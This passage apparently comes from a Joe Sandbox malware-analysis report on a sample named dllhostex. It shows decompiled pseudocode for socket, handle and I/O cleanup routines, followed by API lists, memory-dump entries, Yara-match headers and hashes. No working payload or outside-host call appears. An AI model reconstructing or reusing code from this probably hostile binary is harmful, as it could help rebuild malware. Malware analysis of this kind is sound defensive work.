                                                									__eflags =  *_t27;
                                                									 *(__esi + 0x2c) = __ecx & 0xffffffbf;
                                                									if(__eflags == 0) {
                                                										__eflags = __al & 0x00000001;
                                                										if(__eflags == 0) {
                                                											__eflags = __cl & 0x00000004;
                                                											if(__eflags != 0) {
                                                												 *(__esi + 0x2c) = __ecx;
                                                												__eflags = __cl & 0x00000008;
                                                												if(__eflags != 0) {
                                                													__eax =  *(__esi + 4);
                                                													_t38 = __eax + 4;
                                                													 *_t38 =  *(__eax + 4) - 1;
                                                													__eflags =  *_t38;
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                								__edx = __esi;
                                                								__eax = E01346D00(__esi, __eflags);
                                                								__eflags =  *(__esi + 0x3c);
                                                								if( *(__esi + 0x3c) == 0) {
                                                									__eax =  *(__esi + 0x2c);
                                                									__eflags = __al & 0x00000020;
                                                									if((__al & 0x00000020) == 0) {
                                                										__eax = __eax | 0x00000020;
                                                										__eflags = __eax;
                                                										 *(__esi + 0x2c) = __eax;
                                                										__eax =  *(__edi + 0x2c);
                                                										 *(__esi + 0x28) =  *(__edi + 0x2c);
                                                										 *(__edi + 0x2c) = __esi;
                                                									}
                                                								}
                                                								_t48 = __esi + 0x2c;
                                                								 *_t48 =  *(__esi + 0x2c) & 0xffff3fff;
                                                								__eflags =  *_t48;
                                                								L20:
                                                								__ecx =  *(__esi + 0x2c);
                                                								__eax = __ecx;
                                                								__eax = __ecx & 0x0000000c;
                                                								__eflags = __al - 0xc;
                                                								if(__al != 0xc) {
                                                									__eax =  *(__esi + 4);
                                                									_t52 = __eax + 4;
                                                									 *_t52 =  *(__eax + 4) + 1;
                                                									__eflags =  *_t52;
                                                									__ecx =  *(__esi + 0x2c);
                                                								}
                                                								__ecx = __ecx & 0xfffffffb;
                                                								__ecx = __ecx | 0x00000001;
                                                								__eflags = __ecx;
                                                								 *(__esi + 0x2c) = __ecx;
                                                								_pop(__edi);
                                                								_pop(__esi);
                                                								__esp = __ebp;
                                                								_pop(__ebp);
                                                								return __eax;
                                                								goto L97;
                                                							case 7:
                                                								__edx = __esi;
                                                								__ecx = __edi;
                                                								__eax = E01347F80(__edi, __esi, __edi);
                                                								_pop(__edi);
                                                								_pop(__esi);
                                                								__esp = __ebp;
                                                								_pop(__ebp);
                                                								return __eax;
                                                								goto L97;
                                                							case 8:
                                                								__eflags = __cl & 0x00000004;
                                                								if((__cl & 0x00000004) == 0) {
                                                									goto L49;
                                                								} else {
                                                									__eflags =  *(__edi + 0x34) - __esi;
                                                									if( *(__edi + 0x34) == __esi) {
                                                										__eax =  *(__esi + 0x34);
                                                										 *(__edi + 0x34) =  *(__esi + 0x34);
                                                									}
                                                									__eflags =  *(__edi + 0x40) - __esi;
                                                									if( *(__edi + 0x40) == __esi) {
                                                										__eax =  *(__esi + 0x34);
                                                										 *(__edi + 0x40) =  *(__esi + 0x34);
                                                									}
                                                									L58:
                                                									__ecx =  *(__esi + 0x30);
                                                									__eflags = __ecx;
                                                									if(__ecx != 0) {
                                                										__eax =  *(__esi + 0x34);
                                                										 *(__ecx + 0x34) =  *(__esi + 0x34);
                                                									}
                                                									__ecx =  *(__esi + 0x34);
                                                									__eflags = __ecx;
                                                									if(__ecx != 0) {
                                                										__eax =  *(__esi + 0x30);
                                                										 *(__ecx + 0x30) =  *(__esi + 0x30);
                                                									}
                                                									L62:
                                                									__ecx =  *(__esi + 0x2c);
                                                									__eflags = __cl & 0x00000004;
                                                									if((__cl & 0x00000004) == 0) {
                                                										goto L49;
                                                									} else {
                                                										__ecx = __ecx & 0xfffffffb;
                                                										 *(__esi + 0x2c) = __ecx;
                                                										__eflags = __cl & 0x00000008;
                                                										if((__cl & 0x00000008) == 0) {
                                                											goto L49;
                                                										} else {
                                                											__eax =  *(__esi + 4);
                                                											 *((intOrPtr*)( *(__esi + 4) + 4)) =  *((intOrPtr*)( *(__esi + 4) + 4)) - 1;
                                                											goto L48;
                                                										}
                                                									}
                                                								}
                                                								goto L97;
                                                							case 9:
                                                								__ecx = __ecx & 0x0000000c;
                                                								__eflags = __al - 0xc;
                                                								if(__al != 0xc) {
                                                									_t170 = __edi + 4;
                                                									 *_t170 =  *(__edi + 4) + 1;
                                                									__eflags =  *_t170;
                                                									__ecx =  *(__esi + 0x2c);
                                                								}
                                                								__eax =  *(__esi + 0x7c);
                                                								__ecx = __ecx & 0xfffffffb;
                                                								__ecx = __ecx | 0x00000001;
                                                								 *(__esi + 0x2c) = __ecx;
                                                								__eflags = __eax - 0xffffffff;
                                                								if(__eax == 0xffffffff) {
                                                									L86:
                                                									__eflags =  *(__esi + 0x84);
                                                									if( *(__esi + 0x84) != 0) {
                                                										goto L52;
                                                									} else {
                                                										__eax =  *(__esi + 0x2c);
                                                										__eflags = __al & 0x00000020;
                                                										if((__al & 0x00000020) != 0) {
                                                											goto L52;
                                                										} else {
                                                											__eax = __eax | 0x00000020;
                                                											__eflags = __eax;
                                                											 *(__esi + 0x2c) = __eax;
                                                											__eax =  *(__edi + 0x2c);
                                                											 *(__esi + 0x28) = __eax;
                                                											 *(__edi + 0x2c) = __esi;
                                                											_pop(__edi);
                                                											_pop(__esi);
                                                											__esp = __ebp;
                                                											_pop(__ebp);
                                                											return __eax;
                                                										}
                                                									}
                                                								} else {
                                                									_push(0xffffffff);
                                                									_push(__eax);
                                                									__imp__UnregisterWaitEx();
                                                									__eflags = __eax;
                                                									if(__eax == 0) {
                                                										L96:
                                                										_t200 = E013488E0(_t204, GetLastError(), "UnregisterWaitEx", _t213, _t217);
                                                										asm("fcomp qword [ecx]");
                                                										_t201 = _t200 ^ 0x00000001;
                                                										__eflags = _t201;
                                                										asm("sahf");
                                                										asm("sbb [ecx+eax], esi");
                                                										asm("sbb dh, [ecx+eax]");
                                                										return _t201;
                                                									} else {
                                                										 *(__esi + 0x7c) = 0xffffffff;
                                                										goto L86;
                                                									}
                                                								}
                                                								goto L97;
                                                							case 0xa:
                                                								return E01345760(__ecx);
                                                								goto L97;
                                                							case 0xb:
                                                								__ecx = __esi;
                                                								__eax = E0133FD00(__esi);
                                                								L48:
                                                								__ecx =  *(__esi + 0x2c);
                                                								L49:
                                                								__ecx = __ecx & 0x0000000c;
                                                								__eflags = __al - 0xc;
                                                								if(__al != 0xc) {
                                                									__eax =  *(__esi + 4);
                                                									_t113 = __eax + 4;
                                                									 *_t113 =  *(__eax + 4) + 1;
                                                									__eflags =  *_t113;
                                                									__ecx =  *(__esi + 0x2c);
                                                								}
                                                								__ecx = __ecx & 0xfffffffb;
                                                								__edx = __esi;
                                                								__ecx = __ecx | 0x00000001;
                                                								__eflags = __ecx;
                                                								 *(__esi + 0x2c) = __ecx;
                                                								__ecx = __edi;
                                                								__eax = E0133C0C0(__edi, __esi);
                                                								goto L52;
                                                							case 0xc:
                                                								__eax =  *(__esi + 0x18);
                                                								__eflags = __eax - 0xffffffff;
                                                								if(__eax != 0xffffffff) {
                                                									__eax = E0135FF6B(__eax);
                                                								} else {
                                                									__eax = CloseHandle( *(__esi + 0x90));
                                                								}
                                                								__ecx =  *(__esi + 0x2c);
                                                								__eflags = __ecx & 0x00001000;
                                                								if((__ecx & 0x00001000) != 0) {
                                                									__ecx = __esi;
                                                									__eax = E0133D720(__ebx, __esi, __edx, __edi, __ebp);
                                                									__ecx =  *(__esi + 0x2c);
                                                								}
                                                								__ecx = __ecx & 0xffff3fff;
                                                								 *(__esi + 0x18) = 0xffffffff;
                                                								__eax = __ecx;
                                                								 *(__esi + 0x90) = 0xffffffff;
                                                								__eax = __ecx & 0x0000000c;
                                                								 *(__esi + 0x2c) = __ecx;
                                                								__eflags = __al - 0xc;
                                                								if(__al != 0xc) {
                                                									__eax =  *(__esi + 4);
                                                									_t66 = __eax + 4;
                                                									 *_t66 =  *(__eax + 4) + 1;
                                                									__eflags =  *_t66;
                                                									__ecx =  *(__esi + 0x2c);
                                                								}
                                                								__ecx = __ecx & 0xfffffffb;
                                                								__ecx = __ecx | 0x00000001;
                                                								__eflags =  *(__esi + 0x3c);
                                                								 *(__esi + 0x2c) = __ecx;
                                                								if( *(__esi + 0x3c) != 0) {
                                                									goto L52;
                                                								} else {
                                                									__edx =  *(__esi + 4);
                                                									__eflags = __cl & 0x00000020;
                                                									if((__cl & 0x00000020) != 0) {
                                                										goto L52;
                                                									} else {
                                                										__ecx = __ecx | 0x00000020;
                                                										__eflags = __ecx;
                                                										 *(__esi + 0x2c) = __ecx;
                                                										__eax =  *(__edx + 0x2c);
                                                										 *(__esi + 0x28) = __eax;
                                                										 *(__edx + 0x2c) = __esi;
                                                										_pop(__edi);
                                                										_pop(__esi);
                                                										__esp = __ebp;
                                                										_pop(__ebp);
                                                										return __eax;
                                                									}
                                                								}
                                                								goto L97;
                                                							case 0xd:
                                                								__eflags = __eax - 0xf;
                                                								if(__eax == 0xf) {
                                                									__eflags = __ecx & 0x00001000;
                                                									if((__ecx & 0x00001000) != 0) {
                                                										 *(__esi + 0x2c) = __ecx;
                                                										 *((intOrPtr*)(__edi + 0x5c)) =  *((intOrPtr*)(__edi + 0x5c)) - 1;
                                                										_t83 = __esi + 0x40;
                                                										 *_t83 = 0xffffffff +  *(__esi + 0x40);
                                                										__eflags =  *_t83;
                                                										if( *_t83 == 0) {
                                                											__eax =  *(__esi + 0x2c);
                                                											__eflags = __al & 0x00000001;
                                                											if((__al & 0x00000001) == 0) {
                                                												__eflags = __al & 0x00000004;
                                                												if((__al & 0x00000004) != 0) {
                                                													 *(__esi + 0x2c) = __eax;
                                                													__eflags = __al & 0x00000008;
                                                													if((__al & 0x00000008) != 0) {
                                                														__eax =  *(__esi + 4);
                                                														_t94 = __eax + 4;
                                                														 *_t94 =  *(__eax + 4) - 1;
                                                														__eflags =  *_t94;
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                								_push( *(__esi + 0x38));
                                                								__imp__#3();
                                                								__ecx =  *(__esi + 0x2c);
                                                								__ecx = __ecx & 0x0000000c;
                                                								 *(__esi + 0x38) = 0xffffffff;
                                                								__eflags = __al - 0xc;
                                                								if(__al != 0xc) {
                                                									__eax =  *(__esi + 4);
                                                									_t100 = __eax + 4;
                                                									 *_t100 =  *(__eax + 4) + 1;
                                                									__eflags =  *_t100;
                                                									__ecx =  *(__esi + 0x2c);
                                                								}
                                                								__ecx = __ecx & 0xfffffffb;
                                                								__ecx = __ecx | 0x00000001;
                                                								__eflags =  *(__esi + 0x3c);
                                                								goto L43;
                                                							case 0xe:
                                                								__ecx = __esi;
                                                								__eax = E01341500();
                                                								__ecx =  *(__esi + 0x2c);
                                                								__ecx = __ecx & 0x0000000c;
                                                								__eflags = __al - 0xc;
                                                								if(__al != 0xc) {
                                                									__eax =  *(__esi + 4);
                                                									_t166 = __eax + 4;
                                                									 *_t166 =  *(__eax + 4) + 1;
                                                									__eflags =  *_t166;
                                                									__ecx =  *(__esi + 0x2c);
                                                								}
                                                								__ecx = __ecx & 0xfffffffb;
                                                								__ecx = __ecx | 0x00000001;
                                                								__eflags =  *(__esi + 0x84);
                                                								L43:
                                                								 *(__esi + 0x2c) = __ecx;
                                                								if(__eflags != 0) {
                                                									goto L52;
                                                								} else {
                                                									__eflags = __cl & 0x00000020;
                                                									if((__cl & 0x00000020) != 0) {
                                                										goto L52;
                                                									} else {
                                                										__ecx = __ecx | 0x00000020;
                                                										__eflags = __ecx;
                                                										 *(__esi + 0x2c) = __ecx;
                                                										__eax =  *(__edi + 0x2c);
                                                										 *(__esi + 0x28) = __eax;
                                                										 *(__edi + 0x2c) = __esi;
                                                										_pop(__edi);
                                                										_pop(__esi);
                                                										__esp = __ebp;
                                                										_pop(__ebp);
                                                										return __eax;
                                                									}
                                                								}
                                                								goto L97;
                                                						}
                                                					}
                                                				}
                                                				L97:
                                                			}







                                                0x01341a42
                                                0x01341a45
                                                0x01341a48
                                                0x01341a4b
                                                0x01341a4e
                                                0x01341a51
                                                0x01341a6b
                                                0x01341a6b
                                                0x01341a72
                                                0x00000000
                                                0x01341a78
                                                0x01341a78
                                                0x01341a7b
                                                0x01341a7d
                                                0x00000000
                                                0x01341a83
                                                0x01341a83
                                                0x01341a83
                                                0x01341a86
                                                0x01341a89
                                                0x01341a8c
                                                0x01341a8f
                                                0x01341a92
                                                0x01341a93
                                                0x01341a94
                                                0x01341a96
                                                0x01341a97
                                                0x01341a97
                                                0x01341a7d
                                                0x01341a53
                                                0x01341a53
                                                0x01341a55
                                                0x01341a56
                                                0x01341a5c
                                                0x01341a5e
                                                0x01341afd
                                                0x01341b0a
                                                0x01341b10
                                                0x01341b12
                                                0x01341b12
                                                0x01341b14
                                                0x01341b15
                                                0x01341b19
                                                0x01341b1c
                                                0x01341a64
                                                0x01341a64
                                                0x00000000
                                                0x01341a64
                                                0x01341a5e
                                                0x00000000
                                                0x00000000
                                                0x0134173e
                                                0x00000000
                                                0x00000000
                                                0x0134191a
                                                0x0134191c
                                                0x01341921
                                                0x01341921
                                                0x01341924
                                                0x01341926
                                                0x01341929
                                                0x0134192b
                                                0x0134192d
                                                0x01341930
                                                0x01341930
                                                0x01341930
                                                0x01341933
                                                0x01341933
                                                0x01341936
                                                0x01341939
                                                0x0134193b
                                                0x0134193b
                                                0x0134193e
                                                0x01341941
                                                0x01341943
                                                0x00000000
                                                0x00000000
                                                0x013417ef
                                                0x013417f2
                                                0x013417f5
                                                0x01341806
                                                0x013417f7
                                                0x013417fd
                                                0x013417fd
                                                0x0134180e
                                                0x01341811
                                                0x01341817
                                                0x01341819
                                                0x0134181b
                                                0x01341820
                                                0x01341820
                                                0x01341823
                                                0x01341829
                                                0x01341830
                                                0x01341832
                                                0x0134183c
                                                0x0134183f
                                                0x01341842
                                                0x01341844
                                                0x01341846
                                                0x01341849
                                                0x01341849
                                                0x01341849
                                                0x0134184c
                                                0x0134184c
                                                0x0134184f
                                                0x01341852
                                                0x01341855
                                                0x01341859
                                                0x0134185c
                                                0x00000000
                                                0x01341862
                                                0x01341862
                                                0x01341865
                                                0x01341868
                                                0x00000000
                                                0x0134186e
                                                0x0134186e
                                                0x0134186e
                                                0x01341871
                                                0x01341874
                                                0x01341877
                                                0x0134187a
                                                0x0134187d
                                                0x0134187e
                                                0x0134187f
                                                0x01341881
                                                0x01341882
                                                0x01341882
                                                0x01341868
                                                0x00000000
                                                0x00000000
                                                0x01341883
                                                0x01341886
                                                0x01341888
                                                0x0134188e
                                                0x01341896
                                                0x01341899
                                                0x0134189c
                                                0x0134189c
                                                0x0134189c
                                                0x013418a0
                                                0x013418a2
                                                0x013418a5
                                                0x013418a7
                                                0x013418a9
                                                0x013418ab
                                                0x013418b0
                                                0x013418b3
                                                0x013418b5
                                                0x013418b7
                                                0x013418ba
                                                0x013418ba
                                                0x013418ba
                                                0x013418ba
                                                0x013418b5
                                                0x013418ab
                                                0x013418a7
                                                0x013418a0
                                                0x0134188e
                                                0x013418bd
                                                0x013418c0
                                                0x013418c6
                                                0x013418cb
                                                0x013418ce
                                                0x013418d5
                                                0x013418d7
                                                0x013418d9
                                                0x013418dc
                                                0x013418dc
                                                0x013418dc
                                                0x013418df
                                                0x013418df
                                                0x013418e2
                                                0x013418e5
                                                0x013418e8
                                                0x00000000
                                                0x00000000
                                                0x01341a05
                                                0x01341a07
                                                0x01341a0c
                                                0x01341a11
                                                0x01341a14
                                                0x01341a16
                                                0x01341a18
                                                0x01341a1b
                                                0x01341a1b
                                                0x01341a1b
                                                0x01341a1e
                                                0x01341a1e
                                                0x01341a21
                                                0x01341a24
                                                0x01341a27
                                                0x013418ec
                                                0x013418ec
                                                0x013418ef
                                                0x00000000
                                                0x013418f1
                                                0x013418f1
                                                0x013418f4
                                                0x00000000
                                                0x013418f6
                                                0x013418f6
                                                0x013418f6
                                                0x013418f9
                                                0x013418fc
                                                0x013418ff
                                                0x01341902
                                                0x01341905
                                                0x01341906
                                                0x01341907
                                                0x01341909
                                                0x0134190a
                                                0x0134190a
                                                0x013418f4
                                                0x00000000
                                                0x00000000
                                                0x0134172b
                                                0x01341725
                                                0x00000000

                                                APIs
                                                • CloseHandle.KERNEL32(?), ref: 013417FD
                                                • closesocket.WS2_32(?), ref: 013418C0
                                                • UnregisterWaitEx.KERNEL32(?,000000FF), ref: 01341A56
                                                • GetLastError.KERNEL32(?,013C2220,?,013752AC,4132269F), ref: 01341AFD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseErrorHandleLastUnregisterWaitclosesocket
                                                • String ID: UnregisterWaitEx
                                                • API String ID: 4091028079-3194662728
                                                • Opcode ID: 3e8b773d14e9267addda8b9f18486c5616dd8bffe07d7cf41726eebfa74b850c
                                                • Instruction ID: 4381fd5528cd04a0bdb8240c3d82751f3e0ad261345455f457187efce907042b
                                                • Opcode Fuzzy Hash: 3e8b773d14e9267addda8b9f18486c5616dd8bffe07d7cf41726eebfa74b850c
                                                • Instruction Fuzzy Hash: 3BD11A75600F058FE7358B2DC555762BBE0FB48769B048B1EEAAB86A91D730F481CF84
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __WSAFDIsSet.WS2_32(?,?), ref: 0134B21B
                                                • recv.WS2_32(?,?,00000004,00000000), ref: 0134B236
                                                • __WSAFDIsSet.WS2_32(?,?), ref: 0134B256
                                                • __WSAFDIsSet.WS2_32(?,?), ref: 0134B29B
                                                • __WSAFDIsSet.WS2_32(?,?), ref: 0134B2A4
                                                • __WSAFDIsSet.WS2_32(?,00000000), ref: 0134B2B1
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: recv
                                                • String ID:
                                                • API String ID: 1507349165-0
                                                • Opcode ID: 27bc722045755ffb1c35a058c9ceaf19e0754d4d25e0d1a1c0bf2762958dc327
                                                • Instruction ID: dd6acb3fdeca769c70ca3fb23c50ffa05043ca8d5d37a52da07cb7eee47f604c
                                                • Opcode Fuzzy Hash: 27bc722045755ffb1c35a058c9ceaf19e0754d4d25e0d1a1c0bf2762958dc327
                                                • Instruction Fuzzy Hash: 9431BF716043065FE720AF29DC80B6FBBE8AF84724F044A28FD5987295D730ED198BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 58%
                                                			E01346C40(void* __ecx) {
                                                				signed int _t17;
                                                				intOrPtr _t18;
                                                				void* _t21;
                                                				intOrPtr _t26;
                                                				signed int _t27;
                                                				intOrPtr* _t29;
                                                				void* _t31;
                                                				struct _CRITICAL_SECTION* _t33;
                                                
                                                				_t31 = __ecx;
                                                				_t27 =  *(__ecx + 0x2c);
                                                				_t17 = _t27 & 0x00210000;
                                                				if(_t17 != 0x10000) {
                                                					L11:
                                                					return _t17;
                                                				} else {
                                                					_t26 =  *((intOrPtr*)(__ecx + 0x94));
                                                					if(_t26 == 0xffffffff) {
                                                						goto L11;
                                                					} else {
                                                						if((_t27 & 0x01000000) != 0) {
                                                							_t33 = __ecx + 0x120;
                                                							EnterCriticalSection(_t33);
                                                							_t18 =  *((intOrPtr*)(_t31 + 0x138));
                                                							if(_t18 != 0) {
                                                								if(_t18 == 0xffffffff) {
                                                									L10:
                                                									LeaveCriticalSection(_t33);
                                                									 *(_t31 + 0x2c) =  *(_t31 + 0x2c) | 0x00200000;
                                                									return _t18;
                                                								}
                                                								_t29 = __imp__CancelSynchronousIo;
                                                								do {
                                                									 *_t29(_t18);
                                                									SwitchToThread();
                                                									_t18 =  *((intOrPtr*)(_t31 + 0x138));
                                                								} while (_t18 != 0xffffffff);
                                                								goto L10;
                                                							}
                                                							 *((intOrPtr*)(_t31 + 0x138)) = 0xffffffff;
                                                							LeaveCriticalSection(_t33);
                                                							 *(_t31 + 0x2c) =  *(_t31 + 0x2c) | 0x00200000;
                                                							return _t18;
                                                						} else {
                                                							_t21 = __ecx + 0x64;
                                                							__imp__CancelIoEx(_t26, _t21);
                                                							 *(__ecx + 0x2c) =  *(__ecx + 0x2c) | 0x00200000;
                                                							return _t21;
                                                						}
                                                					}
                                                				}
                                                			}


                                                APIs
                                                • CancelIoEx.KERNEL32(?,?,?,01346D0D,00000000,?,?,?,013417A8), ref: 01346C74
                                                • EnterCriticalSection.KERNEL32(?,?,?,01346D0D,00000000,?,?,?,013417A8), ref: 01346C8B
                                                • LeaveCriticalSection.KERNEL32 ref: 01346CA6
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$CancelEnterLeave
                                                • String ID:
                                                • API String ID: 4260397832-0
                                                • Opcode ID: 8444680fd205546990b33749f2459acfdc8714e80d1cd55b70c8869d443f62d3
                                                • Instruction ID: d07c162f85e381ac90bee4a8410f9cbea84605a879e74d0577022e543b252507
                                                • Opcode Fuzzy Hash: 8444680fd205546990b33749f2459acfdc8714e80d1cd55b70c8869d443f62d3
                                                • Instruction Fuzzy Hash: A1117C715007048FD7749B38E889BE6B3EDEB4A335F504B29F5AAC25C5C730B8828B14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,01363284,?,?,0136324C,?,?), ref: 013632F3
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01363306
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,01363284,?,?,0136324C,?,?), ref: 01363329
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 726263ef57f86391bea171461751a6ec824e81e65028bfdfcb1bd988543085f3
                                                • Instruction ID: e0234567ec2d44069bfbe2b099ac5c2bfcc711c2351169738defc2e6d3b92fb9
                                                • Opcode Fuzzy Hash: 726263ef57f86391bea171461751a6ec824e81e65028bfdfcb1bd988543085f3
                                                • Instruction Fuzzy Hash: B2F0AF31A00218BBDB219FA5D849BAEBFBCFF08715F4041A8F909A2254EF349D40CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E01363A4E(signed int* __ecx, signed int __edx) {
                                                				signed int _v8;
                                                				intOrPtr* _v12;
                                                				signed int _v16;
                                                				signed int _t28;
                                                				signed int _t29;
                                                				intOrPtr _t33;
                                                				signed int _t37;
                                                				signed int _t38;
                                                				signed int _t40;
                                                				void* _t50;
                                                				signed int _t56;
                                                				intOrPtr* _t57;
                                                				signed int _t68;
                                                				signed int _t71;
                                                				signed int _t72;
                                                				signed int _t74;
                                                				signed int _t75;
                                                				signed int _t78;
                                                				signed int _t80;
                                                				signed int* _t81;
                                                				signed int _t85;
                                                				void* _t86;
                                                
                                                				_t72 = __edx;
                                                				_v12 = __ecx;
                                                				_t28 =  *__ecx;
                                                				_t81 =  *_t28;
                                                				if(_t81 != 0) {
                                                					_t29 =  *0x13cc074; // 0x4132269f
                                                					_t56 =  *_t81 ^ _t29;
                                                					_t78 = _t81[1] ^ _t29;
                                                					_t83 = _t81[2] ^ _t29;
                                                					asm("ror edi, cl");
                                                					asm("ror esi, cl");
                                                					asm("ror ebx, cl");
                                                					if(_t78 != _t83) {
                                                						L14:
                                                						 *_t78 = E0135B5BD( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
                                                						_t33 = E013537BE(_t56);
                                                						_t57 = _v12;
                                                						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
                                                						_t24 = _t78 + 4; // 0x4
                                                						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E013537BE(_t24);
                                                						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E013537BE(_t83);
                                                						_t37 = 0;
                                                						L15:
                                                						return _t37;
                                                					}
                                                					_t38 = 0x200;
                                                					_t85 = _t83 - _t56 >> 2;
                                                					if(_t85 <= 0x200) {
                                                						_t38 = _t85;
                                                					}
                                                					_t80 = _t38 + _t85;
                                                					if(_t80 == 0) {
                                                						_t80 = 0x20;
                                                					}
                                                					if(_t80 < _t85) {
                                                						L9:
                                                						_push(4);
                                                						_t80 = _t85 + 4;
                                                						_push(_t80);
                                                						_v8 = E0136DC7E(_t56);
                                                						_t40 = E013656E2(0);
                                                						_t68 = _v8;
                                                						_t86 = _t86 + 0x10;
                                                						if(_t68 != 0) {
                                                							goto L11;
                                                						}
                                                						_t37 = _t40 | 0xffffffff;
                                                						goto L15;
                                                					} else {
                                                						_push(4);
                                                						_push(_t80);
                                                						_v8 = E0136DC7E(_t56);
                                                						E013656E2(0);
                                                						_t68 = _v8;
                                                						_t86 = _t86 + 0x10;
                                                						if(_t68 != 0) {
                                                							L11:
                                                							_t56 = _t68;
                                                							_v8 = _t68 + _t85 * 4;
                                                							_t83 = _t68 + _t80 * 4;
                                                							_t78 = _v8;
                                                							_push(0x20);
                                                							asm("ror eax, cl");
                                                							_t71 = _t78;
                                                							_v16 = 0 ^  *0x13cc074;
                                                							asm("sbb edx, edx");
                                                							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
                                                							_v8 = _t74;
                                                							if(_t74 == 0) {
                                                								goto L14;
                                                							}
                                                							_t75 = _v16;
                                                							_t50 = 0;
                                                							do {
                                                								_t50 = _t50 + 1;
                                                								 *_t71 = _t75;
                                                								_t71 = _t71 + 4;
                                                							} while (_t50 != _v8);
                                                							goto L14;
                                                						}
                                                						goto L9;
                                                					}
                                                				}
                                                				return _t28 | 0xffffffff;
                                                			}

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID:
